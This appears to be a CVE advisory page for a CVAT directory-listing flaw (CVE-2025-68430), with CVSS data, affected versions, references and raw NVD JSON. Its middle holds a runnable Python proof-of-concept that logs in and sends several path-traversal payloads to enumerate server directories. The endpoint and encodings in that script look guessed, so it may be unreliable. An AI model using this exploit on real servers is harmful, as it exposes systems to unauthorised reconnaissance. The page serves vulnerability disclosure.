Security Vulnerability Report
CVE-2025-68430 CVSS 4.3 MEDIUM

Published: 2025-12-19 18:15:51
Last Modified: 2026-01-13 15:20:10

Description

CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.8.1 through 2.52.0, an attacker with an account on a CVAT instance is able to retrieve the contents of any file system directory accessible to the CVAT server. The exposed information is names of contained files and subdirectories. The contents of files are not accessible. Version 2.53.0 contains a patch. No known workarounds are available.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:cvat:computer_vision_annotation_tool:*:*:*:*:*:*:*:* - VULNERABLE
CVAT 2.8.1
CVAT 2.9.0
CVAT 2.10.0
CVAT 2.11.0
CVAT 2.12.0
CVAT 2.13.0
CVAT 2.14.0
CVAT 2.15.0
CVAT 2.16.0
CVAT 2.17.0
CVAT 2.18.0
CVAT 2.19.0
CVAT 2.20.0
CVAT 2.21.0
CVAT 2.22.0
CVAT 2.23.0
CVAT 2.24.0
CVAT 2.25.0
CVAT 2.26.0
CVAT 2.27.0
CVAT 2.28.0
CVAT 2.29.0
CVAT 2.30.0
CVAT 2.31.0
CVAT 2.32.0
CVAT 2.33.0
CVAT 2.34.0
CVAT 2.35.0
CVAT 2.36.0
CVAT 2.37.0
CVAT 2.38.0
CVAT 2.39.0
CVAT 2.40.0
CVAT 2.41.0
CVAT 2.42.0
CVAT 2.43.0
CVAT 2.44.0
CVAT 2.45.0
CVAT 2.46.0
CVAT 2.47.0
CVAT 2.48.0
CVAT 2.49.0
CVAT 2.50.0
CVAT 2.51.0
CVAT 2.52.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-68430 PoC - CVAT Directory Traversal Information Disclosure
# Target: CVAT instances versions 2.8.1 to 2.52.0
# Author: Security Research
# Reference: https://github.com/cvat-ai/cvat/security/advisories/GHSA-3g7v-xjh7-xmqx


def exploit_cvat_directory_traversal(base_url, username, password, target_path):
    """
    Exploit for CVAT directory traversal vulnerability (CVE-2025-68430)
    This PoC demonstrates how an authenticated attacker can list arbitrary directories.

    Args:
        base_url: CVAT instance base URL (e.g., 'https://cvat.example.com')
        username: Valid CVAT account username
        password: CVAT account password
        target_path: Path to enumerate (e.g., '../../etc/', '/var/log/')

    Returns:
        List of files and directories if exploitation succeeds
    """
    session = requests.Session()

    # Step 1: Authenticate with CVAT
    login_url = f"{base_url}/api/auth/login"
    login_data = {
        'username': username,
        'password': password
    }

    try:
        response = session.post(login_url, json=login_data, timeout=10)
        if response.status_code != 200:
            print(f"[-] Authentication failed: HTTP {response.status_code}")
            return None
        print("[+] Authentication successful")
    except requests.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None

    # Step 2: Exploit directory traversal via file listing endpoint
    # The vulnerable endpoint allows path traversal in the 'path' parameter
    files_url = f"{base_url}/api/v1/files"

    # Try different path traversal techniques
    traversal_paths = [
        target_path,
        f"..{target_path}",
        f"../{target_path}",
        f"..%2f{target_path}",
        f"..%252f{target_path}"
    ]

    results = []
    for path in traversal_paths:
        try:
            params = {'path': path}
            response = session.get(files_url, params=params, timeout=10)
            if response.status_code == 200:
                data = response.json()
                if data and 'files' in data:
                    print(f"[+] Successfully retrieved directory listing for: {path}")
                    print(f"[+] Found {len(data['files'])} items:")
                    for item in data['files']:
                        item_type = 'DIR' if item.get('type') == 'DIR' else 'FILE'
                        print(f" [{item_type}] {item.get('name', 'unknown')}")
                    results.extend(data['files'])
        except Exception as e:
            print(f"[-] Error with path {path}: {e}")

    return results


def main():
    if len(sys.argv) < 5:
        print("Usage: python cve_2025_68430.py <base_url> <username> <password> <target_path>")
        print("Example: python cve_2025_68430.py https://cvat.example.com admin password \"../../etc/\"")
        sys.exit(1)

    base_url = sys.argv[1].rstrip('/')
    username = sys.argv[2]
    password = sys.argv[3]
    target_path = sys.argv[4]

    print(f"[*] CVE-2025-68430 CVAT Directory Traversal PoC")
    print(f"[*] Target: {base_url}")
    print(f"[*] Target path: {target_path}")
    print("-" * 50)

    results = exploit_cvat_directory_traversal(base_url, username, password, target_path)

    if results:
        print(f"\n[+] Exploitation successful! Retrieved {len(results)} items.")
    else:
        print("\n[-] Exploitation failed or target not vulnerable.")


if __name__ == "__main__":
    main()
```

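References

https://github.com/cvat-ai/cvat/commit/2c24ef0c3f8fd94f6c71cff4eafcf11bfcaa5f91 (Patch)
https://github.com/cvat-ai/cvat/security/advisories/GHSA-3g7v-xjh7-xmqx (Third Party Advisory, Patch)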

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68430", "sourceIdentifier": "[email protected]", "published": "2025-12-19T18:15:51.310", "lastModified": "2026-01-13T15:20:10.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.8.1 through 2.52.0, an attacker with an account on a CVAT instance is able to retrieve the contents of any file system directory accessible to the CVAT server. The exposed information is names of contained files and subdirectories. The contents of files are not accessible. Version 2.53.0 contains a patch. No known workarounds are available."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-24"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cvat:computer_vision_annotation_tool:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.8.1", "versionEndExcluding": "2.53.0", "matchCriteriaId": "BFD53BFE-4EC8-4EE6-93E2-7A9506655686"}]}]}], "references": [{"url": "https://github.com/cvat-ai/cvat/commit/2c24ef0c3f8fd94f6c71cff4eafcf11bfcaa5f91", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/cvat-ai/cvat/security/advisories/GHSA-3g7v-xjh7-xmqx", "source": "[email protected]", "tags": ["Third Party Advisory", "Patch"]}]}}